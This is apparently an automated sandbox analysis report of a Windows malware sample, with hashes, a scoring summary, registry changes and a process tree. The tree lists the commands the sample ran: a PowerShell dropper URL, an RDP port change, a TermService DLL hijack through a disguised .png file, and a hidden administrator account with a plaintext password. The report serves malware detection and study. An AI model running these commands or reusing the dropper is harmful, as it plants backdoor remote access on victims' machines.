22d15118aebbacd7e69a0dec6c29978bdd5a6ba24d9dbfbe055f0620e37d3c4a

Analysis

max time kernel
48s
max time network
117s
platform
windows10_x64
resource
win10v20201028
submitted
09-11-2020 20:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

22d15118aebbacd7e69a0dec6c29978bdd5a6ba24d9dbfbe055f0620e37d3c4a.exe
Size

3.4MB
MD5

442016bf1c6123cc40ff23c3637396c0
SHA1

cea8d515186cf94bdaa4f78bbf6f5b9db9125c9a
SHA256

22d15118aebbacd7e69a0dec6c29978bdd5a6ba24d9dbfbe055f0620e37d3c4a
SHA512

d95bc9ee83436c7967dbe59e6c5625737053adb074b45972a7855f03d3770d87edde332a8cf4aa02529330178be99005a7b0912e6929d284c685433694199727

Score

10^/10

persistence upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blacklisted process makes network request 9 IoCs

Processes:

powershell.exe

flow	pid	process
21	420	powershell.exe
23	420	powershell.exe
24	420	powershell.exe
25	420	powershell.exe
27	420	powershell.exe
29	420	powershell.exe
31	420	powershell.exe
33	420	powershell.exe
35	420	powershell.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Windows\Branding\mediasrv.png	upx
\Windows\Branding\mediasvc.png	upx

Deletes itself 1 IoCs

Processes:

powershell.exe

pid process

1020 powershell.exe
Loads dropped DLL 2 IoCs

Processes:

pid process

1160
1160

pid	process
1160
1160

Modifies service 2 TTPs 2 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\parameters	reg.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"	reg.exe

Drops file in Program Files directory 4 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI	powershell.exe

Drops file in Windows directory 19 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_x3yyqkwl.ntw.ps1	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIFBAD.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIFBFD.tmp	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File created	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIFBBE.tmp	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_luiem2ot.wui.psm1	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIFB0F.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIFB9D.tmp	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Modifies data under HKEY_USERS 217 IoCs

Processes:

powershell.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\DisplayName = "Internet"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags = "33"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1200 = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1200 = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1200 = "3"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\file = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\LowIcon = "inetcpl.cpl#005424"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\DisplayName = "Internet"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Flags = "33"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Icon = "shell32.dll#0018"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\CurrentLevel = "69632"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\DisplayName = "Trusted sites"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Icon = "shell32.dll#0016"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags = "71"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data."	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\e1be3f182420a0a0 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c000000	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data."	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache,"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\PMDisplayName = "Internet [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyByPass = "0"	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = 7fd9c04391add601	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1200 = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon = "inetcpl.cpl#00004480"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SelfHealCount = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "My Computer"	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

196 reg.exe
Runs net.exe

pid	process
196	reg.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	23	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	25	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

powershell.exepowershell.exe

pid	process
1020	powershell.exe
1020	powershell.exe
1020	powershell.exe
1020	powershell.exe
1020	powershell.exe
1020	powershell.exe
420	powershell.exe
420	powershell.exe
420	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

Processes:

pid process

616
616

pid	process
616
616

Suspicious use of AdjustPrivilegeToken 77 IoCs

Processes:

powershell.exe

description	pid	process
Token: SeDebugPrivilege	1020	powershell.exe
Token: SeIncreaseQuotaPrivilege	1020	powershell.exe
Token: SeSecurityPrivilege	1020	powershell.exe
Token: SeTakeOwnershipPrivilege	1020	powershell.exe
Token: SeLoadDriverPrivilege	1020	powershell.exe
Token: SeSystemProfilePrivilege	1020	powershell.exe
Token: SeSystemtimePrivilege	1020	powershell.exe
Token: SeProfSingleProcessPrivilege	1020	powershell.exe
Token: SeIncBasePriorityPrivilege	1020	powershell.exe
Token: SeCreatePagefilePrivilege	1020	powershell.exe
Token: SeBackupPrivilege	1020	powershell.exe
Token: SeRestorePrivilege	1020	powershell.exe
Token: SeShutdownPrivilege	1020	powershell.exe
Token: SeDebugPrivilege	1020	powershell.exe
Token: SeSystemEnvironmentPrivilege	1020	powershell.exe
Token: SeRemoteShutdownPrivilege	1020	powershell.exe
Token: SeUndockPrivilege	1020	powershell.exe
Token: SeManageVolumePrivilege	1020	powershell.exe
Token: 33	1020	powershell.exe
Token: 34	1020	powershell.exe
Token: 35	1020	powershell.exe
Token: 36	1020	powershell.exe
Token: SeIncreaseQuotaPrivilege	1020	powershell.exe
Token: SeSecurityPrivilege	1020	powershell.exe
Token: SeTakeOwnershipPrivilege	1020	powershell.exe
Token: SeLoadDriverPrivilege	1020	powershell.exe
Token: SeSystemProfilePrivilege	1020	powershell.exe
Token: SeSystemtimePrivilege	1020	powershell.exe
Token: SeProfSingleProcessPrivilege	1020	powershell.exe
Token: SeIncBasePriorityPrivilege	1020	powershell.exe
Token: SeCreatePagefilePrivilege	1020	powershell.exe
Token: SeBackupPrivilege	1020	powershell.exe
Token: SeRestorePrivilege	1020	powershell.exe
Token: SeShutdownPrivilege	1020	powershell.exe
Token: SeDebugPrivilege	1020	powershell.exe
Token: SeSystemEnvironmentPrivilege	1020	powershell.exe
Token: SeRemoteShutdownPrivilege	1020	powershell.exe
Token: SeUndockPrivilege	1020	powershell.exe
Token: SeManageVolumePrivilege	1020	powershell.exe
Token: 33	1020	powershell.exe
Token: 34	1020	powershell.exe
Token: 35	1020	powershell.exe
Token: 36	1020	powershell.exe
Token: SeIncreaseQuotaPrivilege	1020	powershell.exe
Token: SeSecurityPrivilege	1020	powershell.exe
Token: SeTakeOwnershipPrivilege	1020	powershell.exe
Token: SeLoadDriverPrivilege	1020	powershell.exe
Token: SeSystemProfilePrivilege	1020	powershell.exe
Token: SeSystemtimePrivilege	1020	powershell.exe
Token: SeProfSingleProcessPrivilege	1020	powershell.exe
Token: SeIncBasePriorityPrivilege	1020	powershell.exe
Token: SeCreatePagefilePrivilege	1020	powershell.exe
Token: SeBackupPrivilege	1020	powershell.exe
Token: SeRestorePrivilege	1020	powershell.exe
Token: SeShutdownPrivilege	1020	powershell.exe
Token: SeDebugPrivilege	1020	powershell.exe
Token: SeSystemEnvironmentPrivilege	1020	powershell.exe
Token: SeRemoteShutdownPrivilege	1020	powershell.exe
Token: SeUndockPrivilege	1020	powershell.exe
Token: SeManageVolumePrivilege	1020	powershell.exe
Token: 33	1020	powershell.exe
Token: 34	1020	powershell.exe
Token: 35	1020	powershell.exe
Token: 36	1020	powershell.exe

Suspicious use of WriteProcessMemory 68 IoCs

Processes:

22d15118aebbacd7e69a0dec6c29978bdd5a6ba24d9dbfbe055f0620e37d3c4a.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.execmd.execmd.exe

description	pid	process	target process
PID 580 wrote to memory of 1020	580	22d15118aebbacd7e69a0dec6c29978bdd5a6ba24d9dbfbe055f0620e37d3c4a.exe	powershell.exe
PID 580 wrote to memory of 1020	580	22d15118aebbacd7e69a0dec6c29978bdd5a6ba24d9dbfbe055f0620e37d3c4a.exe	powershell.exe
PID 1020 wrote to memory of 3584	1020	powershell.exe	csc.exe
PID 1020 wrote to memory of 3584	1020	powershell.exe	csc.exe
PID 3584 wrote to memory of 2400	3584	csc.exe	cvtres.exe
PID 3584 wrote to memory of 2400	3584	csc.exe	cvtres.exe
PID 1020 wrote to memory of 212	1020	powershell.exe	reg.exe
PID 1020 wrote to memory of 212	1020	powershell.exe	reg.exe
PID 1020 wrote to memory of 196	1020	powershell.exe	reg.exe
PID 1020 wrote to memory of 196	1020	powershell.exe	reg.exe
PID 1020 wrote to memory of 732	1020	powershell.exe	reg.exe
PID 1020 wrote to memory of 732	1020	powershell.exe	reg.exe
PID 1020 wrote to memory of 3008	1020	powershell.exe	net.exe
PID 1020 wrote to memory of 3008	1020	powershell.exe	net.exe
PID 3008 wrote to memory of 4012	3008	net.exe	net1.exe
PID 3008 wrote to memory of 4012	3008	net.exe	net1.exe
PID 1020 wrote to memory of 2400	1020	powershell.exe	cmd.exe
PID 1020 wrote to memory of 2400	1020	powershell.exe	cmd.exe
PID 2400 wrote to memory of 3680	2400	cmd.exe	cmd.exe
PID 2400 wrote to memory of 3680	2400	cmd.exe	cmd.exe
PID 3680 wrote to memory of 2944	3680	cmd.exe	net.exe
PID 3680 wrote to memory of 2944	3680	cmd.exe	net.exe
PID 2944 wrote to memory of 1724	2944	net.exe	net1.exe
PID 2944 wrote to memory of 1724	2944	net.exe	net1.exe
PID 1020 wrote to memory of 2308	1020	powershell.exe	cmd.exe
PID 1020 wrote to memory of 2308	1020	powershell.exe	cmd.exe
PID 2308 wrote to memory of 1000	2308	cmd.exe	cmd.exe
PID 2308 wrote to memory of 1000	2308	cmd.exe	cmd.exe
PID 1000 wrote to memory of 1056	1000	cmd.exe	net.exe
PID 1000 wrote to memory of 1056	1000	cmd.exe	net.exe
PID 1056 wrote to memory of 2060	1056	net.exe	net1.exe
PID 1056 wrote to memory of 2060	1056	net.exe	net1.exe
PID 3080 wrote to memory of 1600	3080	cmd.exe	net.exe
PID 3080 wrote to memory of 1600	3080	cmd.exe	net.exe
PID 1600 wrote to memory of 1500	1600	net.exe	net1.exe
PID 1600 wrote to memory of 1500	1600	net.exe	net1.exe
PID 1060 wrote to memory of 508	1060	cmd.exe	net.exe
PID 1060 wrote to memory of 508	1060	cmd.exe	net.exe
PID 508 wrote to memory of 3500	508	net.exe	net1.exe
PID 508 wrote to memory of 3500	508	net.exe	net1.exe
PID 3708 wrote to memory of 3792	3708	cmd.exe	net.exe
PID 3708 wrote to memory of 3792	3708	cmd.exe	net.exe
PID 3792 wrote to memory of 912	3792	net.exe	net1.exe
PID 3792 wrote to memory of 912	3792	net.exe	net1.exe
PID 1724 wrote to memory of 2400	1724	cmd.exe	net.exe
PID 1724 wrote to memory of 2400	1724	cmd.exe	net.exe
PID 2400 wrote to memory of 1336	2400	net.exe	net1.exe
PID 2400 wrote to memory of 1336	2400	net.exe	net1.exe
PID 3932 wrote to memory of 1704	3932	cmd.exe	net.exe
PID 3932 wrote to memory of 1704	3932	cmd.exe	net.exe
PID 1704 wrote to memory of 2212	1704	net.exe	net1.exe
PID 1704 wrote to memory of 2212	1704	net.exe	net1.exe
PID 772 wrote to memory of 3048	772	cmd.exe	net.exe
PID 772 wrote to memory of 3048	772	cmd.exe	net.exe
PID 3048 wrote to memory of 188	3048	net.exe	net1.exe
PID 3048 wrote to memory of 188	3048	net.exe	net1.exe
PID 500 wrote to memory of 3024	500	cmd.exe	WMIC.exe
PID 500 wrote to memory of 3024	500	cmd.exe	WMIC.exe
PID 804 wrote to memory of 2944	804	cmd.exe	WMIC.exe
PID 804 wrote to memory of 2944	804	cmd.exe	WMIC.exe
PID 1020 wrote to memory of 1492	1020	powershell.exe	cmd.exe
PID 1020 wrote to memory of 1492	1020	powershell.exe	cmd.exe
PID 496 wrote to memory of 3008	496	cmd.exe	cmd.exe
PID 496 wrote to memory of 3008	496	cmd.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\22d15118aebbacd7e69a0dec6c29978bdd5a6ba24d9dbfbe055f0620e37d3c4a.exe
"C:\Users\Admin\AppData\Local\Temp\22d15118aebbacd7e69a0dec6c29978bdd5a6ba24d9dbfbe055f0620e37d3c4a.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:580

\??\c:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
-ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps1
2⤵
- Deletes itself
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1020

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\exvorycj\exvorycj.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:3584

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES72E4.tmp" "c:\Users\Admin\AppData\Local\Temp\exvorycj\CSCA0829ACF0674A82AF57138E0B8E8.TMP"
4⤵
PID:2400

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
3⤵
PID:212

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
3⤵
- Modifies service
- Modifies registry key
PID:196

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
3⤵
PID:732

C:\Windows\system32\net.exe
"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
3⤵
- Suspicious use of WriteProcessMemory
PID:3008

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
4⤵
PID:4012

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
3⤵
- Suspicious use of WriteProcessMemory
PID:2400

C:\Windows\system32\cmd.exe
cmd /c net start rdpdr
4⤵
- Suspicious use of WriteProcessMemory
PID:3680

C:\Windows\system32\net.exe
net start rdpdr
5⤵
- Suspicious use of WriteProcessMemory
PID:2944

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start rdpdr
6⤵
PID:1724

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
3⤵
- Suspicious use of WriteProcessMemory
PID:2308

C:\Windows\system32\cmd.exe
cmd /c net start TermService
4⤵
- Suspicious use of WriteProcessMemory
PID:1000

C:\Windows\system32\net.exe
net start TermService
5⤵
- Suspicious use of WriteProcessMemory
PID:1056

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start TermService
6⤵
PID:2060

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
3⤵
PID:1492

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
3⤵
PID:212

C:\Windows\System32\cmd.exe
cmd /C net.exe user updwin Ghasar4f5 /del
1⤵
- Suspicious use of WriteProcessMemory
PID:3080

C:\Windows\system32\net.exe
net.exe user updwin Ghasar4f5 /del
2⤵
- Suspicious use of WriteProcessMemory
PID:1600

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user updwin Ghasar4f5 /del
3⤵
PID:1500

C:\Windows\System32\cmd.exe
cmd /C net.exe user updwin aG4xSuFP /add
1⤵
- Suspicious use of WriteProcessMemory
PID:1060

C:\Windows\system32\net.exe
net.exe user updwin aG4xSuFP /add
2⤵
- Suspicious use of WriteProcessMemory
PID:508

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user updwin aG4xSuFP /add
3⤵
PID:3500

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" updwin /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:3708

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" updwin /ADD
2⤵
- Suspicious use of WriteProcessMemory
PID:3792

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" updwin /ADD
3⤵
PID:912

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:1724

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD
2⤵
- Suspicious use of WriteProcessMemory
PID:2400

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD
3⤵
PID:1336

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" updwin /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:3932

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Administrators" updwin /ADD
2⤵
- Suspicious use of WriteProcessMemory
PID:1704

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Administrators" updwin /ADD
3⤵
PID:2212

C:\Windows\System32\cmd.exe
cmd /C net.exe user updwin aG4xSuFP
1⤵
- Suspicious use of WriteProcessMemory
PID:772

C:\Windows\system32\net.exe
net.exe user updwin aG4xSuFP
2⤵
- Suspicious use of WriteProcessMemory
PID:3048

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user updwin aG4xSuFP
3⤵
PID:188

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
- Suspicious use of WriteProcessMemory
PID:500

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
2⤵
